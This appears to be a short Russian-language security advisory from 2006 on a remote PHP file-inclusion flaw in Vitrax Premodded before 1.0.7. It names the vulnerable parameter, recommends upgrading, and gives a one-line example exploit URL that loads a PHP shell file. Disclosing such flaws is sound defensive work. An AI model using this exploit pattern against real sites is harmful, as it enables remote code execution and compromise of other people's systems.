php инклюдинг в Vitrax Premodded

Дата публикации:
13.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
3435
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Vitrax Premodded 1.x
Уязвимые версии: Vitrax Premodded до версии 1.0.7

Описание: Злоумышленник может скомпрометировать уязвимую систему.

Сценарий includes/functions_portal.php не достаточно фильтрует данные в параметре "phpbb_root_path" перед использованием для включения файлов. В результате можно выполнить произвольный PHP код, включая файлы с локальных или удаленных источников.

Пример/Эксплоит: http://[target]/[path]/includes/functions_portal.php?phpbb_root_path=phpshell.txt?

Решение:Установите версию 1.0.7


или введите имя

CAPTCHA